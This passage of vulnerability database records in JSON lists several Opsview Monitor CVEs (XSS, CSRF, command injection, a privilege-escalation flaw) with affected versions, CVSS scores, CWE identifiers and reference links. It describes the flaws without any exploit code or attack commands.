"db": "VULMON",
"id": "CVE-2018-16146"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16146"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
"date": "2018-09-05T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16146"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"date": "2018-09-05T17:57:27",
"db": "PACKETSTORM",
"id": "149236"
},
{
"date": "2018-09-05T21:29:02.797000",
"db": "NVD",
"id": "CVE-2018-16146"
},
{
"date": "2018-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16146"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-16146"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Opsview Monitor Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
],
"trust": 0.6
}
}
FKIE_CVE-2013-3936
Vulnerability from fkie_nvd - Published: 2020-01-02 15:15 - Updated: 2024-11-21 01:54| Vendor | Product | Version | |
|---|---|---|---|
| opsview | opsview | * | |
| opsview | opsview_core | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5394676A-D216-4650-80AF-ED7F1543AB0F",
"versionEndExcluding": "4.4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview_core:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D21F51C8-99B8-491C-8F22-CBD005968DA9",
"versionEndExcluding": "20130522",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Opsview before 4.4.1 and Opsview Core before 20130522 allow remote attackers to inject arbitrary web script or HTML."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades de tipo cross-site scripting (XSS) en Opsview versiones anteriores a la versi\u00f3n 4.4.1 y Opsview Core versiones anteriores a la versi\u00f3n 20130522, permiten a atacantes remotos inyectar script web o HTML arbitrario."
}
],
"id": "CVE-2013-3936",
"lastModified": "2024-11-21T01:54:34.350",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-01-02T15:15:11.490",
"references": [
{
"source": "PSIRT-CNA@flexerasoftware.com",
"tags": [
"Vendor Advisory"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
},
{
"source": "PSIRT-CNA@flexerasoftware.com",
"tags": [
"Broken Link",
"Vendor Advisory"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link",
"Vendor Advisory"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
}
],
"sourceIdentifier": "PSIRT-CNA@flexerasoftware.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2013-3935
Vulnerability from fkie_nvd - Published: 2020-01-02 15:15 - Updated: 2024-11-21 01:54| Vendor | Product | Version | |
|---|---|---|---|
| opsview | opsview | * | |
| opsview | opsview_core | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5394676A-D216-4650-80AF-ED7F1543AB0F",
"versionEndExcluding": "4.4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview_core:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D21F51C8-99B8-491C-8F22-CBD005968DA9",
"versionEndExcluding": "20130522",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Cross-site request forgery (CSRF) vulnerability in Opsview before 4.4.1 and Opsview Core before 20130522 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via unspecified vectors."
},
{
"lang": "es",
"value": "Una vulnerabilidad de tipo cross-site request forgery (CSRF) en Opsview versiones anteriores a la versi\u00f3n 4.4.1 y Opsview Core versiones anteriores a la versi\u00f3n 20130522, permite a atacantes remotos secuestrar la autenticaci\u00f3n de administradores para peticiones que cambian la contrase\u00f1a de administrador por medio de vectores no especificados."
}
],
"id": "CVE-2013-3935",
"lastModified": "2024-11-21T01:54:34.237",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-01-02T15:15:11.413",
"references": [
{
"source": "PSIRT-CNA@flexerasoftware.com",
"tags": [
"Release Notes"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
},
{
"source": "PSIRT-CNA@flexerasoftware.com",
"tags": [
"Broken Link"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
}
],
"sourceIdentifier": "PSIRT-CNA@flexerasoftware.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-352"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2018-16148
Vulnerability from fkie_nvd - Published: 2018-09-05 21:29 - Updated: 2024-11-21 03:52| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | https://knowledge.opsview.com/v5.3/docs/whats-new | Release Notes, Vendor Advisory | |
| cve@mitre.org | https://knowledge.opsview.com/v5.4/docs/whats-new | Release Notes, Vendor Advisory | |
| cve@mitre.org | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory | |
| cve@mitre.org | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.3/docs/whats-new | Release Notes, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.4/docs/whats-new | Release Notes, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4BA91D4C-DEBC-47E3-84EF-660587F02D1E",
"versionEndExcluding": "5.3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "60700697-09A0-4FBB-A747-2411A7A022BC",
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The diagnosticsb2ksy parameter of the /rest endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
},
{
"lang": "es",
"value": "El par\u00e1metro diagnosticsb2ksy del endpoint /rest en Opsview Monitor en versiones anteriores a la 5.3.1 y versiones 5.4.x anteriores a la 5.4.2 es vulnerable a Cross-Site Scripting (XSS)."
}
],
"id": "CVE-2018-16148",
"lastModified": "2024-11-21T03:52:10.150",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-09-05T21:29:03.063",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2018-16145
Vulnerability from fkie_nvd - Published: 2018-09-05 21:29 - Updated: 2024-11-21 03:52| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | https://knowledge.opsview.com/v5.3/docs/whats-new | Release Notes, Vendor Advisory | |
| cve@mitre.org | https://knowledge.opsview.com/v5.4/docs/whats-new | Release Notes, Vendor Advisory | |
| cve@mitre.org | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory | |
| cve@mitre.org | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.3/docs/whats-new | Release Notes, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.4/docs/whats-new | Release Notes, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4BA91D4C-DEBC-47E3-84EF-660587F02D1E",
"versionEndExcluding": "5.3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "60700697-09A0-4FBB-A747-2411A7A022BC",
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The /etc/init.d/opsview-reporting-module script that runs at boot time in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 invokes a file that can be edited by the nagios user, and would allow attackers to elevate their privileges to root after a system restart, hence obtaining full control of the appliance."
},
{
"lang": "es",
"value": "El script en /etc/init.d/opsview-reporting-module que se ejecuta en tiempo de ejecuci\u00f3n en Opsview Monitor en versiones anteriores a la 5.3.1 y versiones 5.4.x anteriores a la 5.4.2 invoca un archivo que puede ser editado por el usuario nagios y permitir\u00eda que los atacantes eleven sus privilegios a root tras un reinicio del sistema, obteniendo as\u00ed el control total del aparato."
}
],
"id": "CVE-2018-16145",
"lastModified": "2024-11-21T03:52:09.680",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-09-05T21:29:02.627",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-732"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2018-16147
Vulnerability from fkie_nvd - Published: 2018-09-05 21:29 - Updated: 2024-11-21 03:52| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | https://knowledge.opsview.com/v5.3/docs/whats-new | Release Notes, Vendor Advisory | |
| cve@mitre.org | https://knowledge.opsview.com/v5.4/docs/whats-new | Release Notes, Vendor Advisory | |
| cve@mitre.org | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory | |
| cve@mitre.org | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.3/docs/whats-new | Release Notes, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.4/docs/whats-new | Release Notes, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4BA91D4C-DEBC-47E3-84EF-660587F02D1E",
"versionEndExcluding": "5.3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "60700697-09A0-4FBB-A747-2411A7A022BC",
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The data parameter of the /settings/api/router endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
},
{
"lang": "es",
"value": "El par\u00e1metro data del endpoint /settings/api/router en Opsview Monitor en versiones anteriores a la 5.3.1 y versiones 5.4.x anteriores a la 5.4.2 es vulnerable a Cross-Site Scripting (XSS)."
}
],
"id": "CVE-2018-16147",
"lastModified": "2024-11-21T03:52:09.987",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-09-05T21:29:02.937",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2018-16144
Vulnerability from fkie_nvd - Published: 2018-09-05 21:29 - Updated: 2024-11-21 03:52| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | https://knowledge.opsview.com/v5.3/docs/whats-new | Release Notes, Vendor Advisory | |
| cve@mitre.org | https://knowledge.opsview.com/v5.4/docs/whats-new | Release Notes, Vendor Advisory | |
| cve@mitre.org | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory | |
| cve@mitre.org | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.3/docs/whats-new | Release Notes, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.4/docs/whats-new | Release Notes, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4BA91D4C-DEBC-47E3-84EF-660587F02D1E",
"versionEndExcluding": "5.3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "60700697-09A0-4FBB-A747-2411A7A022BC",
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The test connection functionality in the NetAudit section of Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to command injection due to improper sanitization of the rancid_password parameter."
},
{
"lang": "es",
"value": "La funcionalidad de conexi\u00f3n de prueba en la secci\u00f3n NetAudit de Opsview Monitor en versiones anteriores a la 5.3.1 y versiones 5.4.x anteriores a la 5.4.2 es vulnerable a una inyecci\u00f3n de comandos debido al saneamiento incorrecto del par\u00e1metro rancid_password."
}
],
"id": "CVE-2018-16144",
"lastModified": "2024-11-21T03:52:09.503",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-09-05T21:29:02.500",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
